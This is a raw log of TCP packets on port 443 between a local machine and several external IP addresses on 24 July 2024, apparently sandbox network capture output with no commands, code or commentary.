Jul 24, 2024 19:56:57.383737087 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.383821964 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.391716957 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.391767025 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.392388105 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.392441988 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.461661100 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.461736917 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.462265015 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.462410927 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.463717937 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.463768005 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.465776920 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.466216087 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.468786001 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.468837023 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.469163895 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.469208002 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.473017931 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.473026037 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.473078012 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.473105907 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.473124981 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.473134995 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.473221064 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.473767042 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.473822117 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.475308895 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.475367069 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.476070881 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.476125002 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.477607012 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.477710009 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.478384018 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.478485107 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.479913950 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.479975939 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.480678082 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.480923891 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.482070923 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.482130051 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.483266115 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.483375072 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.484183073 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.484227896 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.485131979 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.485203028 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.489340067 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.489396095 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.489476919 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.490036964 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.490140915 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.491523027 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.491595030 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.507613897 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.561489105 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.561552048 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.561755896 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.561824083 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.563112020 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.563384056 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.564470053 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.564546108 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.565131903 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.565177917 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.566510916 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.566595078 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.567198992 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.567246914 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.567816019 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.567858934 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.569194078 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.569240093 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.570005894 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.570036888 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.570058107 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.570072889 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.570110083 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.572566032 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.572602034 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.572633982 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.572662115 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.572662115 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.572669029 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.572707891 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.572707891 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.574026108 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.574079037 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.574835062 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.574878931 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.575437069 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.575589895 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.575650930 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.576399088 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.576428890 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.576466084 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.576472044 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.576491117 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.577477932 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.577574015 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.577579021 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.577691078 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.578260899 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.578299999 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.579152107 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.579186916 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.579220057 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.579226017 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.579256058 CEST	443	49763	31.14.70.245	192.168.2.10
Jul 24, 2024 19:56:57.579305887 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:57.773334980 CEST	443	49765	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:57.773403883 CEST	49765	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:57.776837111 CEST	49765	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:57.776845932 CEST	443	49765	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:57.777132034 CEST	443	49765	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:57.779957056 CEST	49765	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:57.780133009 CEST	49765	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:57.780158997 CEST	443	49765	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:57.780219078 CEST	49765	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:57.780225992 CEST	443	49765	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:58.072415113 CEST	443	49764	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:58.072508097 CEST	443	49764	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:58.072695017 CEST	49764	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:58.092058897 CEST	49764	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:58.092101097 CEST	443	49764	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:58.092128038 CEST	49764	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:56:58.092137098 CEST	443	49764	107.173.160.137	192.168.2.10
Jul 24, 2024 19:56:58.194773912 CEST	49766	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:58.194823980 CEST	443	49766	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:58.194901943 CEST	49766	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:58.195378065 CEST	49766	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:58.195413113 CEST	443	49766	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:58.401556015 CEST	443	49765	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:58.401807070 CEST	443	49765	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:58.402055979 CEST	49765	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:58.402182102 CEST	49765	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:58.402204990 CEST	443	49765	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:58.489660978 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:56:58.823008060 CEST	443	49766	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:58.823079109 CEST	49766	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:58.828255892 CEST	49766	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:58.828284979 CEST	443	49766	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:58.828381062 CEST	49766	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:58.828387976 CEST	443	49766	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:58.828594923 CEST	443	49766	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:58.828783989 CEST	49766	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:56:58.876502037 CEST	443	49766	107.173.160.139	192.168.2.10
Jul 24, 2024 19:56:59.343944073 CEST	49767	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:59.344001055 CEST	443	49767	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:59.344073057 CEST	49767	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:59.344930887 CEST	49767	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:59.344947100 CEST	443	49767	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:59.871200085 CEST	443	49767	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:59.871319056 CEST	49767	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:59.872720957 CEST	49767	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:59.872729063 CEST	443	49767	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:59.872977972 CEST	443	49767	188.114.96.3	192.168.2.10
Jul 24, 2024 19:56:59.876657009 CEST	49767	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:59.876773119 CEST	49767	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:56:59.876779079 CEST	443	49767	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:00.067943096 CEST	443	49766	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:00.068013906 CEST	443	49766	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:00.068131924 CEST	49766	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:00.084707022 CEST	49766	443	192.168.2.10	107.173.160.139
Jul 24, 2024 19:57:00.084728956 CEST	443	49766	107.173.160.139	192.168.2.10
Jul 24, 2024 19:57:00.194921970 CEST	49768	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:00.194978952 CEST	443	49768	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:00.195343971 CEST	49768	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:00.195820093 CEST	49768	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:00.195830107 CEST	443	49768	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:00.292805910 CEST	443	49767	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:00.292923927 CEST	443	49767	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:00.292983055 CEST	49767	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:00.293715954 CEST	49767	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:00.293739080 CEST	443	49767	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:00.927453995 CEST	443	49768	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:00.927584887 CEST	49768	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:00.963973045 CEST	49768	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:00.963995934 CEST	443	49768	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:00.964083910 CEST	49768	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:00.964087963 CEST	443	49768	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:00.964127064 CEST	49768	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:00.964129925 CEST	443	49768	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:00.965019941 CEST	443	49768	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:00.965214014 CEST	49768	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:01.008553028 CEST	443	49768	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:01.563016891 CEST	49769	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:01.563071966 CEST	443	49769	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:01.563149929 CEST	49769	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:01.563968897 CEST	49769	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:01.563982010 CEST	443	49769	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:01.587625980 CEST	49763	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:01.613219023 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:01.613270998 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:01.613357067 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:01.613864899 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:01.613877058 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:01.914021969 CEST	443	49768	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:01.914113998 CEST	443	49768	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:01.914167881 CEST	49768	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:01.949955940 CEST	49768	443	192.168.2.10	167.235.128.153
Jul 24, 2024 19:57:01.949989080 CEST	443	49768	167.235.128.153	192.168.2.10
Jul 24, 2024 19:57:02.045351028 CEST	443	49769	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:02.045423985 CEST	49769	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:02.048578024 CEST	49769	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:02.048589945 CEST	443	49769	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:02.048810005 CEST	443	49769	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:02.050034046 CEST	49769	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:02.051014900 CEST	49769	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:02.051032066 CEST	443	49769	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:02.051132917 CEST	49769	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:02.051155090 CEST	443	49769	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:02.051254034 CEST	49769	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:02.051280022 CEST	443	49769	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:02.051383972 CEST	49769	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:02.051407099 CEST	443	49769	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:02.051531076 CEST	49769	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:02.051557064 CEST	443	49769	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:02.051680088 CEST	49769	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:02.051707983 CEST	443	49769	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:02.051719904 CEST	49769	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:02.051731110 CEST	443	49769	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:02.051843882 CEST	49769	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:02.051870108 CEST	443	49769	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:02.051892042 CEST	49769	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:02.052030087 CEST	49769	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:02.052057981 CEST	49769	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:02.055286884 CEST	49771	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:02.055340052 CEST	443	49771	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:02.055421114 CEST	49771	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:02.055879116 CEST	49771	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:02.055891991 CEST	443	49771	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:02.067766905 CEST	443	49769	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:02.067962885 CEST	49769	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:02.068000078 CEST	443	49769	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:02.068028927 CEST	49769	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:02.068063021 CEST	49769	443	192.168.2.10	188.114.96.3
Jul 24, 2024 19:57:02.079138994 CEST	443	49769	188.114.96.3	192.168.2.10
Jul 24, 2024 19:57:02.292896986 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.299062014 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.299073935 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.679641962 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.679680109 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.679757118 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.679774046 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.679811954 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.683929920 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.683989048 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.688885927 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.688946962 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.700083017 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.700148106 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.723552942 CEST	443	49771	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:02.723617077 CEST	49771	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:02.727027893 CEST	49771	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:02.727050066 CEST	443	49771	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:02.727099895 CEST	49771	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:02.727106094 CEST	443	49771	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:02.727142096 CEST	49771	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:02.727145910 CEST	443	49771	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:02.727315903 CEST	443	49771	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:02.727463007 CEST	49771	443	192.168.2.10	107.173.160.137
Jul 24, 2024 19:57:02.727478981 CEST	443	49771	107.173.160.137	192.168.2.10
Jul 24, 2024 19:57:02.778419971 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.778486967 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.778773069 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.778822899 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.779926062 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.780033112 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.781234980 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.781285048 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.781312943 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.781346083 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.784599066 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.784648895 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.792021990 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.792097092 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.797193050 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.797250032 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.801974058 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.802025080 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.869740009 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.869888067 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.869899988 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.869959116 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.870027065 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.870066881 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.870560884 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.870618105 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.870749950 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.870800972 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.871632099 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.871706963 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.876068115 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.876136065 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.876225948 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.876312971 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.877496004 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.877557993 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.877646923 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.877809048 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.884206057 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.884236097 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.884255886 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.884274006 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.884306908 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.884318113 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.892117023 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.892190933 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.896411896 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.896480083 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.903707981 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.904505014 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.945987940 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.946064949 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.969022989 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.969202995 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.969247103 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.969247103 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.969278097 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.969330072 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.971728086 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.971771955 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.971806049 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.971815109 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.971815109 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.971831083 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.971977949 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.972014904 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.972017050 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.972017050 CEST	49770	443	192.168.2.10	31.14.70.245
Jul 24, 2024 19:57:02.972031116 CEST	443	49770	31.14.70.245	192.168.2.10
Jul 24, 2024 19:57:02.972811937 CEST	49770	443	192.168.2.10	31.14.70.245
